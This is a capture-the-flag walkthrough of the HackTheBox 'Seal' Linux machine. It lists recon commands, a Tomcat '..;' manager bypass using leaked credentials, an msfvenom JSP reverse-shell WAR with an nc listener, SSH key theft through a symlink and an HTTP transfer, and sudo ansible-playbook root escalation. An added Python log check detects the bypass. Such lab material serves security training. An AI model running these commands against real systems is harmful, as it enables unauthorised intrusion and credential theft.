Seal

HTB Linux

echo "10.129.186.118 seal.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA seal 10.129.186.118 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA seal 10.129.186.118

nmap -sU -O -p- -oA seal-udp 10.129.186.118

nikto -h 10.129.186.118:80

gobuster dir -k -u http://10.129.186.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://10.129.186.118/FUZZ -t 200

We go to http://10.129.186.118:8080

We go to http://10.129.186.118:8080/register and create a user

We go to root /seal market and look at tomcat-users.xml

We find the tomcat user with its password

We go to http://10.129.186.118/manager/status

And we use the tomcat credentials we found in the previous step.

We go to http://10.129.186.118/manager/status/..;/html
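
Added example (not part of the original write-up): a log check for the `..;` request used above. A servlet container such as Tomcat drops the `;...` path parameter from each segment before resolving `..`, so the raw path and the path the container serves differ; the script flags that mismatch. The protected prefixes and the sample log lines are assumptions constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Paths that should not be reachable from outside (assumed policy).
PROTECTED_PREFIXES = ("/manager/html", "/host-manager")

def servlet_view(raw_path: str) -> str:
    """Approximate the path a servlet container serves: percent-decode,
    drop ';param' suffixes from every segment, then resolve '.' and '..'."""
    decoded = unquote(raw_path.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    return normpath("/".join(segments)) if decoded.startswith("/") else decoded

def inspect(line: str):
    """Return (raw_path, effective_path, reasons), or None if the line is clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m.group("target").split("?", 1)[0]
    effective = servlet_view(raw)
    reasons = []
    if re.search(r"(^|/)\.\.;", unquote(raw)):
        reasons.append("dot-dot-semicolon segment")
    if effective.startswith(PROTECTED_PREFIXES) and not raw.startswith(PROTECTED_PREFIXES):
        reasons.append("raw path hides protected target")
    return (raw, effective, reasons) if reasons else None

# Constructed sample log lines (documentation addresses, not from the page).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /manager/status HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "GET /manager/status/..;/html HTTP/1.1" 200 9000',
    '192.0.2.11 - - [01/Jan/2025:10:01:00 +0000] "GET /index.html;jsessionid=abc HTTP/1.1" 200 100',
]

def scan(lines):
    """Return every flagged request found in an iterable of log lines."""
    return [hit for hit in map(inspect, lines) if hit]

if __name__ == "__main__":
    for raw, effective, reasons in scan(SAMPLE_LOG):
        print(f"{raw} -> {effective}: {', '.join(reasons)}")
```

An ordinary `;jsessionid=` parameter is not flagged; only a `..;` segment or a raw path that resolves into a protected prefix is reported.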

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f war -o seal_shell.war

We upload the war file on the applications page

We refresh the page and see that seal_shell.war was uploaded

We click deploy

nc -lvnp 4444

We get a reverse shell

ps -aux | grep -i 'bin/sh'

ls -ahl /opt/backups/archives

cd /var/lib/tomcat9/webapps/ROOT/admin/dashboard/

cd /home

cd luis

ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

cd .ssh

cp /opt/backups/archives/backup-2021-07-21-17:30:33.gz rsa.gz

gzip -kd rsa

cd .ssh

python3 -m http.server 8888

wget http://10.129.186.118:8888/id_rsa.pub

chmod 600 id_rsa

ssh -i id_rsa luis@seal.htb

Create the file root.yml

- name: Ansible Copy Example Local to Remote
  hosts: localhost
  tasks:
    - name: copying file with playbook
      become: true
      copy:
        src: /root/root.txt
        dest: /dev/shm
        owner: luis
        group: luis
        mode: 0777

sudo /usr/bin/ansible-playbook root.yml

© 2025 Cu3rv0x